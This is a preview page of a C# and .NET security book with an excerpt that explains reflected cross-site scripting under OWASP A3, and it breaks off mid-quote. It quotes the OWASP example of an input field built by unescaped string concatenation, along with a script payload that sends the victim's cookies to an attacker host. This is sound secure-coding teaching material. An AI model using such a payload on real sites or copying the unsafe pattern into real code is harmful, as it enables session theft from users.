Book Image

Mastering C# and .NET Framework

Book Image

Mastering C# and .NET Framework

Overview of this book

Mastering C# and .NET Framework will take you in to the depths of C# 6.0/7.0 and .NET 4.6, so you can understand how the platform works when it runs your code, and how you can use this knowledge to write efficient applications. Take full advantage of the new revolution in .NET development, including open source status and cross-platform capability, and get to grips with the architectural changes of CoreCLR. Start with how the CLR executes code, and discover the niche and advanced aspects of C# programming – from delegates and generics, through to asynchronous programming. Run through new forms of type declarations and assignments, source code callers, static using syntax, auto-property initializers, dictionary initializers, null conditional operators, and many others. Then unlock the true potential of the .NET platform. Learn how to write OWASP-compliant applications, how to properly implement design patterns in C#, and how to follow the general SOLID principles and its implementations in C# code. We finish by focusing on tips and tricks that you'll need to get the most from C# and .NET. This book also covers .NET Core 1.1 concepts as per the latest RTM release in the last chapter.
Table of Contents (21 chapters)
Mastering C# and .NET Framework
Credits
About the Author
Acknowledgements
About the Reviewer
www.PacktPub.com
Preface
Index

A3 – Cross-Site Scripting (XSS)


XSS is said to be one of the most problematic security issues due to the lack of knowledge about it and its lack of prevention among the developer's community.

This is quite simple in some of its implementations, though, and that's why it is so dangerous. There are three known forms of XSS attacks: stored, reflected, and DOM based.

One of the official examples of these attacks (reflected) presents the following code:

"<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

That is, the pages build an input field based on a request. Also, an attacker can modify the page in this way:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

What happens? The inserted code reflects the requested information about a user to the attacker, or to say it as in the OWASP documentation:

"This causes the victim's SessionID is sent to the attacker's website, allowing the attacker to...